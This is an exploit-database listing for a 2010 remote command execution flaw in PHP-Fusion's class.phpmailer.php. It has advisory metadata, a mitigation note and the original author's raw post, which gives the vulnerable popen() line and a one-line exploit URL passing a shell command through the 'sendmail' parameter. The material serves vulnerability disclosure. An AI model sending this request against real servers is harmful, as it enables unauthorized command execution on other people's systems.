PHP-Fusion Remote Command Execution Vulnerability

vendor:

PHP-Fusion

by:

ViRuS Qalaa

9,3

CVSS

HIGH

Remote Command Execution

CWE

Product Name: PHP-Fusion

Affected Version From: all

Affected Version To: all

Patch Exists: YES

Related CWE: N/A

CPE: a:phpfusion-ar:php-fusion

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows

2010

PHP-Fusion Remote Command Execution Vulnerability

The vulnerability exists in the popen() function in the includes/class.phpmailer.php file. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable server. This will allow the attacker to execute arbitrary commands on the server.

Mitigation:

The vendor has released a patch to address this vulnerability. It is recommended to upgrade to the latest version of the software.

Source

Exploit-DB raw data:

# Exploit Title:   PHP-Fusion Remote Command Execution Vulnerability
# Date: 2010/07/19
# Author: ViRuS Qalaa
# Email: em9@live.com
# My Sites : www.pal-mafia.com & www.vbspiders.com
# Script home: http://www.phpfusion-ar.com
# download Script:
http://www.phpfusion-ar.com/downloads.php?cat_id=1&download_id=91
# Version:all
# Tested on: Windows
# Team hacker:ViRuS Qalaa & HaCkEr aRaR >>>X-MaN HaCk3r TeaM
:::::::::::::::::::::::::
=================Exploit=================

-=[ vuln c0de ]=-
popen($sendmail, 'w'))
/includes/class.phpmailer.php
Line:438

----exploit----

http://{localhost}/{path}/includes/class.phpmailer.php?sendmail=id

---------greatz----------
Greatz to :
hacker arar,ViRuS KSA,Q2,Spy-iq

and My friends Others and My friends in MSN
EnJoY o_O